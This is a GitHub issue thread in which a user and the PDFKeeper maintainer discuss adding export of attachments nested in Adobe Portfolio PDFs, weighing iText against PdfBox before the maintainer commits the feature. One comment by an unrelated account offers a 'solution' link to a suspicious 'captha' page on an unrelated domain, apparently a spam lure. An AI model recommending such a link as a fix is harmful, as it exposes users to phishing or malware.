### ISSUE TITLE
[Feature] Option to Export Attachments / Nested PDFs

### ISSUE THREAD

**Issue by pa-0** [rffrasca/PDFKeeper#33]
**Is your feature request related to a problem? Please describe.**
Adobe's Portfolio PDF is incompatible with all viewers save for Adobe reader.   

**Describe the solution you'd like**
An easy way to unpack the pdf attachments nested in some PDFs.

**Comment by rffrasca** [comment]
Are you looking to unpack Portfolio PDFs already uploaded into PDFKeeper or do you need to unpack so you can upload contents within the Portfolio PDF into PDFKeeper?

**Comment by pa-0** [comment]
Ideally, both -- (the priority) so that I can share externally without requiring the recipient to download Adobe Reader to view the files and (bonus) so that I can manage those nested files individually within PDFKeeper.

**Comment by rffrasca** [comment]
For the unpack, I'm thinking when an item is selected in the grid to check if the associated PDF is a portfolio. When the PDF is a portfolio, enable a menu item that can be selected to perform the unpack to a selected disk folder. To make the feature more robust, I can also provide the capability to unpack to a zip file if you see value with that.

Regarding the second part. It sounds like you may be looking for a dialog with a list of child files from the PDF portfolio for the selected grid item. In the dialog, you can select an item from the list and perform functions such as open with default application (when file is not PDF), save to disk, and copy to clipboard?

**Comment by pa-0** [comment]
I don't think I could have articulated it better myself!  I'm still a beginner, but I'm currently researchng the different methods to accomplish the unpacking part in C#.  If I manage to produce something worth sharing, I'll post any updates here.

**Comment by rffrasca** [comment]
I should be able to start on the unpack feature later this month.

**Comment by pa-0** [comment]
I found a couple of projects already that are advertised of having this capability.  Of the two I found, one uses iText (not the most ideal licensing terms) and this one that leverages PdfBox which might be more appealing a solution which is described as capable of both attaching and detaching embedded files to existing PDFs.: [PDFAttacher](https://github.com/thomasforth/PDFAttacher/tree/master/PDFAttacher) with a couple of caveats:

1. PDFBox dependency is actually a nuget packaged .NET wrapper for the original Java solution, and it does not appear to have been updated since in ten years+
2. I was able to build the program without issue; however it does not appear to work -- at least not for PDF Portfolio files.  This could be a problem with the dependency, or (just as likely) an unsuccessful migration from .NET Framework version 4.6.1 --> 4.8.  I have Visual Studio Pro 2022, and upon importing the project, a dialog appeared asking if I'd like to upgrade the project to the newer version of the framework.  The process appeared completed without issue, as did the build process. However, testing it by dragging multiple different portfolio PDFs to the form resulted in no attachments being displayed.  

All in all, my research thus far does not seem to have been very fruitful.  At any rate, I hope this is helpful on some level, at least.

**Comment by rffrasca** [comment]
I was planning on using iText for this since it is already used in PDFKeeper for PDF text and annotations extraction, reading and writing PDF metadata, and PDF page splitting. Not the easiest product to work with but in my opinion, the "best out there for working with PDF" and is updated quarterly.

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by rffrasca** [comment]
Hi Peter, just wanted to give you an update. So far, I have been able to extract attachments out of a couple of sample PDF's that I found on the internet. These samples share one thing in common, the attachments are defined in the PDF /EmbeddedFiles dictionary.

Here is a screen capture of a sample PDF opened in iText RUPS - https://github.com/itext/i7j-rups/releases/download/7.2.5/itext-rups-7.2.5-exe-archive.zip

![image](https://github.com/user-attachments/assets/5e98de64-7d39-4d35-b8cd-8257f23f5887)

Using RUPS, can you check the PDF's you're trying to extract from to see if they are structured the same as the sample?

**Comment by rffrasca** [comment]
Feature for extracting all attachments in a PDF to ZIP file or folder has been committed.
